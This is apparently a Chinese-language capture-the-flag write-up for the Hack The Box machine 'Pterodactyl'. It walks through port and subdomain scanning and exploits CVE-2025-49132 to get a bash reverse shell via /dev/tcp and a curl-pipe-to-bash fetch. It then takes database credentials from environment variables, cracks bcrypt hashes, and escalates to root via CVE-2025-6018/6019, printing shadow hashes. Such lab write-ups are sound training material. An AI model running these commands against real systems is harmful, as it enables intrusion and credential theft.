基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ nmap -sC -sV -Pn 10.129.249.215
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-12 18:39 +0900
Nmap scan report for 10.129.249.215
Host is up (0.096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6 (protocol 2.0)
| ssh-hostkey:
|   256 a3:74:1e:a3:ad:02:14:01:00:e6:ab:b4:18:84:16:e0 (ECDSA)
|_  256 65:c8:33:17:7a:d6:52:3d:63:c3:e4:a9:60:64:2d:cc (ED25519)
80/tcp open  http    nginx 1.21.5
|_http-server-header: nginx/1.21.5
|_http-title: Did not follow redirect to http://pterodactyl.htb/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1062.06 seconds

80

需要加hosts:

1
10.129.249.215 pterodactyl.htb

游戏相关的:

子域名扫描

子域名可以发现一个panel:

1
2
3
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://pterodactyl.htb/" -H "Host: FUZZ.pterodactyl.htb" -fs 145

panel                   [Status: 200, Size: 1897, Words: 490, Lines: 36, Duration: 333ms]

panel

可以看到就是使用pterodactyl:

CVE-2025-49132

搜索可以发现相关漏洞:

然后一步步操作,得到wwwrun shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
# shell.sh
bash -i >& /dev/tcp/10.10.14.17/4444 0>&1

# http server
python3 -m http.server 7777

# listener
penelope -p 4444

# exploit
python3 ape1.py --host panel.pterodactyl.htb --interactive

shell> curl http://10.10.14.17:7777/shell.sh | bash

user flag

wwwrun可以访问phileasfogg3用户目录:

env

环境变量里可以得到一些信息,包括数据库密码:

1
2
3
4
5
6
7
8
9
10
wwwrun@pterodactyl:/home/phileasfogg3> env

HASHIDS_SALT=pKkOnx0IzJvaUXKWt2PK
APP_KEY=base64:UaThTPQnUjrrK61o+Luk7P9o4hM+gl4UiMJqcbTSThY=
DB_PORT=3306
DB_HOST=127.0.0.1
DB_PASSWORD=PteraPanel
DB_USERNAME=pterodactyl
DB_CONNECTION=mysql
DB_DATABASE=panel

mysql

然后查看数据库,在其中得到hash,破解出密码:

1
2
3
4
5
6
7
8
9
10
mysql -h 127.0.0.1 -u pterodactyl -p'PteraPanel'

MariaDB [(none)]> show databases;
MariaDB [(none)]> use panel;
MariaDB [panel]> show tables;
MariaDB [panel]> desc users;
MariaDB [panel]> select username,password from users;

headmonitor $2y$10$3WJht3/5GOQmOXdljPbAJet2C6tHP4QoORy1PSj59qJrU0gdX5gD2
phileasfogg3 $2y$10$PwO0TBZA8hLB6nuSsxRqoOuXuGi3I4AVVN2IgE7mZJLzky1vGC9Pi

可以破解出phileasfogg3的密码:

1
2
3
sudo hashcat -m 3200 hash.txt ~/Tools/dict/rockyou.txt

!QAZ2wsx

phileasfogg3

得到的密码可以登录phileasfogg3,邮件里提示下一步:

1
phileasfogg3@pterodactyl:~> cat /var/mail/phileasfogg3

邮件里说是和外部media有关,结合系统opensuse,搜索到相关漏洞:

CVE-2025-6018 & CVE-2025-6019

所以先利用6018创造出6019所需的allow_active条件:

1
python3 CVE-2025-6018.py -i pterodactyl.htb -u phileasfogg3 -p '!QAZ2wsx'

得到的是一个交互终端,在里面运行6019,要先本地生成xfs.image然后传上去:

1
2
3
4
5
6
7
8
scp xfs.image phileasfogg3@pterodactyl.htb:/home/phileasfogg3

# 6019的代码也需要稍微修改一下,第9行,因为机器上没有mkfs.xfs
# local deps=("dd" "mkfs.xfs" "mount" "umount" "udisksctl" "gdbus" "killall" "grep" "chmod" "cp")
local deps=("dd" "mount" "umount" "udisksctl" "gdbus" "killall" "grep" "chmod" "cp")


./exploit.sh

root flag

运行完6019之后,tmp里可以看到一个suid的bash(这里输出不完整,没显示出suid bash路径,自己手动检查tmp即可):

shadow

1
2
root:$6$iOhjvxjnk.Sgt97C$Fr4NzyL9SEFOiH653sh30DAR1kmR9jxGNeWMplTMQmlXVO/CfRXy7q2xopOBkfG2SG/I3O7KDOFHT7bOTZG.a0:20343::::::
phileasfogg3:$6$Zc6vsfIsXPSjCLgU$1CEcVIqk717ztdSj0VJ3CaCxSsGYV8N2DgJsJGXeDKoYoBmc8l2F5LbvWFfRYuyBn0Xf5t1Tx4i9Ao8xsSnXQ.:20399:0:99999:7:::

参考资料